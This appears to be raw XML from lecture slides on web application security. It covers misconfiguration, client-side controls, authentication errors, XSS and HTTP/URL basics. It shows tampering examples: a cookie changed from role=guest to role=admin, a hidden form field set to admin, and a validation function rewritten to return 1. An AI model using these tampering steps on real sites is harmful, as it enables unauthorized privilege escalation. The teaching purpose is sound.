              <a:t>how to modify it in ways that are relevant to its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>can make test cases that are valid and carefully targeted at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>application’s behavior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Application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Vulnerabilities, attacks, and countermeasures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 smtClean="0"/>
              <a:t>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err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr 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Client-side controls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Authentication errors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Cross-site scripting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SQL injection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Cross-site request forgery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solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr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Misconfiguration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Outdated versions of the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Outdated versions of third-party web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Guessable passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>FTP/SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Retrievable source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trojaned home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IN" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The computer system that listens for HTTP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connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server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software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(Apache,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Microsoft’s IIS) usually runs on this system to handle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those connections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400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The computer or software that makes a connection to a server, requesting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data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2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client software is most often a web browser, but there are lots of other things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that make requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adobe’s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Flash player can make HTTP requests, as can Java applications, Adobe’s PDF Reader, and most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software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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If you have ever run a program and seen a message that said “There’s a new version of this software,” that usually means the software made an HTTP request to a server somewhere to find out if a new version is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available</a:t>
            </a:r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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=guest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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hidden form parameters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“role” value=“guest”&gt;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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hidden form parameters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“role” value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hidden form parameters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“role” value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>JavaScript checks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>function validateRole() { … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean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Client-side controls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 not rely on client-side controls that are not enforced on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Cookie: role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hidden form parameters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“role” value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>JavaScript checks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>function validateRole() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>return 1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean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object reference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 displays only the “authorized” objects for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BUT it does not enforce the authorization rules on the server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can force the navigation (“forceful browsing”) to gain unauthorized access to these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Authentication errors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Weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enforce strong, easy-to-remember passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>forceable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enforce upper limit on the number of errors in a given time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verbose failure messages (“wrong password”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not leak information to attacker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Cross-site scripting (XSS)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4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Attacker injects malicious code into vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35844" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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Cross-site scripting (XSS)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0" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Attacker injects malicious code into vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Victim visits vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36868" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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871" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2909888"/>
            <a:ext cx="2924175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Round Diagonal Corner Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3022600"/>
            <a:ext cx="1905000" cy="558800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1905000 w 1905000"/>
              <a:gd name="T1" fmla="*/ 279400 h 558800"/>
              <a:gd name="T2" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T3" fmla="*/ 558800 h 558800"/>
              <a:gd name="T4" fmla="*/ 0 w 1905000"/>
              <a:gd name="T5" fmla="*/ 279400 h 558800"/>
              <a:gd name="T6" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T7" fmla="*/ 0 h 558800"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 27278 w 1905000"/>
              <a:gd name="T13" fmla="*/ 27278 h 558800"/>
              <a:gd name="T14" fmla="*/ 1877722 w 1905000"/>
              <a:gd name="T15" fmla="*/ 531522 h 558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000" h="558800">
                <a:moveTo>
                  <a:pt x="93135" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1905000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="465665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1905000" y="517102"/>
                  <a:pt x="1863302" y="558799"/>
                  <a:pt x="1811865" y="558800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="558800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="93135"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="41697"/>
                  <a:pt x="41697" y="0"/>
                  <a:pt x="93134" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F0EAF9"/>
              </a:gs>
              <a:gs pos="64999">
                <a:srgbClr val="D9CBEE"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C9B5E8"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7D60A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defTabSz="914400" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>GET /posts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Cookie: s=01a4b8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en-IN" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E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ncapsulates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what the client wants to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know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C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onsist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of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URL, parameters, and metadata in the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form of headers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Universal Resource Locator (URL) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A special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type of Universal Resource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Identifier (URI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicates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the location of something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manipulate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via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HTTP/ HTTPs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2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocol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is followed by a standard token (://)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- separates the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protocol from the rest of the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location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then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there is an optional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{user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ID,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colon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and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password}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Next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comes the name of the server to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contact, a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path to the resource on that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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are  optional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parameters to that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resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finally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it is possible to use a hash sign (#)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to reference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an internal fragment or anchor inside the body of the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page</a:t>
            </a:r>
            <a:endParaRPr lang="en-I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Cross-site scripting (XSS)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4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1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Attacker injects malicious code into vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Victim visits vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Malicious code is served to victim by web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37892" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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895" name="Straight Connector 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2909888"/>
            <a:ext cx="2924175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9" name="Round Diagonal Corner Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3022600"/>
            <a:ext cx="1990725" cy="914400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1990725 w 1990725"/>
              <a:gd name="T1" fmla="*/ 457200 h 914400"/>
              <a:gd name="T2" fmla="*/ 995363 w 1990725"/>
              <a:gd name="T3" fmla="*/ 914400 h 914400"/>
              <a:gd name="T4" fmla="*/ 0 w 1990725"/>
              <a:gd name="T5" fmla="*/ 457200 h 914400"/>
              <a:gd name="T6" fmla="*/ 995363 w 1990725"/>
              <a:gd name="T7" fmla="*/ 0 h 914400"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 44637 w 1990725"/>
              <a:gd name="T13" fmla="*/ 44637 h 914400"/>
              <a:gd name="T14" fmla="*/ 1946088 w 1990725"/>
              <a:gd name="T15" fmla="*/ 869763 h 914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0725" h="914400">
                <a:moveTo>
                  <a:pt x="152403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1990725" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1990725" y="761997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1990725" y="846166"/>
                  <a:pt x="1922491" y="914399"/>
                  <a:pt x="1838322" y="914400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="914400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="152403"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="68233"/>
                  <a:pt x="68233" y="0"/>
                  <a:pt x="152402" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F0EAF9"/>
              </a:gs>
              <a:gs pos="64999">
